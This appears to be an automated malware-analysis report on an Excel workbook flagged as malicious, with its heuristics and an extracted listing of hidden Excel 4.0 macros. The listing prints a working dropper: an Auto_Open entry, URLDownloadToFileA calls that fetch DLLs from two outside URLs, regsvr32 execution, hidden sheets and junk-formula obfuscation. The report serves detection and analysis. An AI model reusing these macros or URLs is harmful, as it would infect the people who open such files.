MALICIOUS
Risk Score: 222
Heuristics (6)

- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API.
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://nws.visionconsulting.ro/N1G1KCXA/dot.html (in document text, OLE body)
  - https://royalpalm.sparkblue.lk/vCNhYrq3Yg8/dot.html (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 17715 bytes |

SHA-256: eb1a85b2bbf754c5f5dae60baa52abbc4b128717013d604cd0057230ddf0f92c

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 shell/COM execution token(s))

Preview script (first 1,000 lines of the extracted script):
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - Doc
' 0018 32 LABEL : Cell Value, String Constant - _xlfn.AGGREGATE hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 31 LABEL : Cell Value, String Constant - _xlfn.F.INV.RT hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Doc!CA7
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Doc,CJ29,"",0.00000000000000000000
' Doc,CO41,"LEFT("LdecvsbgvrsxLxrgxg",1)",""
' Doc,BW10,"CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"https://nws.visionconsulting.ro/N1G1KCXA/dot.html","..\iroto.dll",0,0)",""
' Doc,BW11,"CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"https://royalpalm.sparkblue.lk/vCNhYrq3Yg8/dot.html","..\iroto1.dll",0,0)",""
' Doc,BW14,EXEC("regsvr32 -s "&"..\iroto.dll"),""
' Doc,BW15,EXEC("regsvr32 -s "&"..\iroto1.dll"),""
' Doc,BW19,HALT(),""
' Doc,CD15,"ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=
ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634
867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329
589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=FORMULA("U"& Doc!BY16& Doc!CL29& Doc!CL30, Doc!BY10)",""
' Doc,CD16,"['FORMULA(\x00Doc!CJ39&\x00Doc!CO28&\x00Doc!BY17&\x00Doc!CJ43&\x00Doc!BY10&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!BY11&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!BY12&\x00Doc!CJ41&\x00Doc!CJ45&\x00Doc!CJ42&\x00Doc!CJ41&"https://"&\x00Doc!BY13&\x00Doc!CJ41&\x00Doc!CJ42&\x00Doc!CJ41&\x00Doc!CI24&\x00Doc!CJ41&\x00Doc!CJ45&\x00Doc!CJ45&\x00Doc!CJ44,\x00Doc!BW10)', '452354.00000000000000000000=SUMXMY2(45245)']",""
' Doc,CA17,"FORMULA( Doc!CL28, Doc!BY16)",""
' Doc,CD17,"FORMULA( Doc!CJ39& Doc!CO28& Doc!BY17& Doc!CJ43& Doc!BY10& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!BY11& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!BY12& Doc!CJ41& Doc!CJ45& Doc!CJ42& Doc!CJ41&"https://"& Doc!BY14& Doc!CJ41& Doc!CJ42& Doc!CJ41& Doc!CI25& Doc!CJ41& Doc!CJ45& Doc!CJ45& Doc!CJ44, Doc!BW11)",""
' Doc,CG17,"WORKBOOK.HIDE("Doc2",1)",""
' Doc,CA18,"FORMULA( Doc!CO36, Doc!BY13)",""
' Doc,CD18,GOTO( Doc!BW8),""
' Doc,CG18,"WORKBOOK.HIDE("Doc3",1)",""
' Doc,CA19,"FORMULA("U"& Doc!BY16& Doc!CL32& Doc!CJ31& Doc!CL31& Doc!CL34& Doc!CJ32&"eA", Doc!BY11)",""
' Doc,CG19,"WORKBOOK.HIDE("Doc4",1)",""
' Doc,CA20,"FORMULA( Doc!CO41, Doc!BY17)",""
' Doc,CG20,"ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=
ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634
867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=ABS(87452634867213107329
589011813285672510464283272130242348751686885912109163959323297595260510582865920.00000000000000000000)=ACOS(78947561234876795599709969853406929702810725797355505844224.00000000000000000000)=ACOSH(8769769797897860545492382096123330822144.00000000000000000000)=FORMULA("="& Doc!CG29& Doc!CG36& Doc!CG37& Doc!CG38& Doc!CG34& Doc!CG35& Doc!CG34& Doc!CI24& Doc!CG33, Doc!BW14)",""
' Doc,CA21,"FORMULA( Doc!CO37, Doc!BY14)",""
' Doc,CG21,"FORMULA("="& Doc!CG29& Doc!CG36& Doc!CG37& Doc!CG38& Doc!CG34& Doc!CG35& Doc!CG34& Doc!CI25& Doc!CG33, Doc!BW15)",""
' Doc,CG22,CD12(),""
' Doc,CA25,"FORMULA( Doc!CM28& Doc!CM29& Doc!CM30&"B", Doc!BY12)",""
' Doc,CA26,CG16(),""